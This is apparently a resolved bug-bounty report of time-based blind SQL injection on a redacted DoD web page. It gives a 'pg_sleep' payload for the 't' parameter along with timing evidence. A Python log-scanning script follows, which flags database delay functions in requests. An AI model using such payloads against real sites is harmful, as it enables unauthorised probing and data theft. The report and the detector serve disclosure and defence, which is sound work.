Blind SQL Injection on DoD Site
Medium
Vulnerability Details
Hi there, one of the DoD sites is vulnerable to blind SQL injection.
#Affected Domain:
www.███
#PoC:
Navigate to the URL below:
``http://www.█████████/viewVideo.asp?t=7``
Just replace ``7`` with ``pg_sleep(__30__)--``
***GET /viewVideo.asp?t=pg_sleep(__30__)--***
In the response you can see a time delay compared with ``viewVideo.asp?t=7``
#####Time Slot:
*viewVideo.asp?t=7* -----------> 240-330 milliseconds
*viewVideo.asp?t=pg_sleep(__30__)--* -----------> 15000-19000 milliseconds
#Fix:
Should sanitize the dangerous input or use parameterised queries.
Let me know if any further info is required.
Regards,
**Mr_R3boot**.
Report Stats
- Report ID: 242882
- State: Closed
- Substate: resolved
- Upvotes: 3
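
A defender-side check for the timing pattern described in this report, as an added example that is not part of the original report: it scans access-log lines for database delay functions in query parameters and compares each request's duration with the endpoint's baseline for numeric input. The log format, the sample lines and the function names are constructed for illustration.

```python
import re
from statistics import median
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines: "<method> <url> <status> <duration_ms>".
SAMPLE_LOG = """\
GET /viewVideo.asp?t=7 200 240
GET /viewVideo.asp?t=12 200 310
GET /viewVideo.asp?t=3 200 330
GET /viewVideo.asp?t=9 200 2900
GET /viewVideo.asp?t=pg_sleep(__30__)-- 200 15000
GET /viewVideo.asp?t=pg_sleep(__30__)-- 200 19000
GET /viewVideo.asp?t=pg_sleep(__30__)-- 500 280
"""

# Time-delay primitives of common engines (PostgreSQL, MySQL, SQL Server).
DELAY_RE = re.compile(r"pg_sleep|\bsleep\s*\(|benchmark\s*\(|waitfor\s+delay", re.I)

def parse(log):
    """Yield (path, [(param, value)], duration_ms) per non-empty line."""
    for line in filter(str.strip, log.splitlines()):
        _method, url, _status, ms = line.split()
        parts = urlsplit(url)
        yield parts.path, parse_qsl(parts.query, keep_blank_values=True), int(ms)

def flag_time_based_sqli(log, slow_factor=5.0):
    """Flag delay-function payloads; mark those that also stalled the endpoint."""
    rows = list(parse(log))
    findings = []
    for path, params, ms in rows:
        hits = [name for name, value in params if DELAY_RE.search(value)]
        if not hits:
            continue  # a slow request with ordinary input is not evidence
        # Baseline: median latency of this endpoint for all-numeric parameters.
        clean = [d for p, q, d in rows
                 if p == path and q and all(v.isdigit() for _, v in q)]
        base = median(clean) if clean else None
        delayed = base is not None and ms > slow_factor * base
        findings.append({"path": path, "params": hits, "ms": ms,
                         "baseline_ms": base,
                         "verdict": "delay-observed" if delayed else "attempt-only"})
    return findings

if __name__ == "__main__":
    for finding in flag_time_based_sqli(SAMPLE_LOG):
        print(finding)
```

A "delay-observed" verdict means the payload text and the latency jump coincide, which is the signal worth escalating; "attempt-only" means the payload appeared but the endpoint answered at its normal speed.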